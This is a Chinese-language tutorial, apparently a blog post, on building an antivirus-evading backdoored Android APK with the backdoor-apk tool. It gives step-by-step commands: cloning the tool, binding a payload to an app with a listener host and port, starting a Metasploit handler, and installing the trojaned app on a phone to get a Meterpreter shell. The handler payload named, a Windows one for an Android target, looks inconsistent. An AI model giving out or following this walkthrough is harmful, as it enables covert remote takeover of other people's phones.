安卓Apk免杀工具：backdoor-apk 教程

backdoor-apk 从名字上我们就能知道它的用途了，没错就是用来制作 APK 后门的。这款工具使用起来非常方便，而且功能也很强大！话不多说，下面我们直接进入正题。

首先，让我们对它进行安装，在安装前我们需要先安装它的一些依赖 lib 库文件：

apt-get install lib32stdc++6 lib32ncurses5 lib32z1

这里询问我们，对这些安装的服务，当他们更新时不再进行询问。我们选择 Yes 即可！

在完成以上依赖库的安装后接着我们就可以安装 backdoor-apk 啦!

git clone https://github.com/dana-at-cp/backdoor-apk.git

下载完成后我们进入到其文件目录下：

cd backdoor-apk/

cd backdoor-apk/

在当前目录下，我们可以看到一个脚本文件。这里，我们需要提前准备一个用来绑定后门的 APK 文件。

./backdoor-apk.sh /root/secist.apk

选择 3 payload

LHOST:192.168.15.131

LPORT:4444

成功执行以上操作后，会生成一个绑定后门的 secist.apk 文件，默认被保存在 backdoor-apk>>original>>dist 目录下！下面我们来启动侦听：

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.15.131

set lport 4444

exploit

同时，我将生成的带有后门的 APK 发送至我的手机，并进行安装打开！

很快我们可以看到，我已经取得了手机的 meterpreter shell ！

简单输入一个,查看系统信息的命令：

sysinfo

可以看到目标系统为 安卓6 版本，内核为 linux 3.10.49 架构为 armv7l 。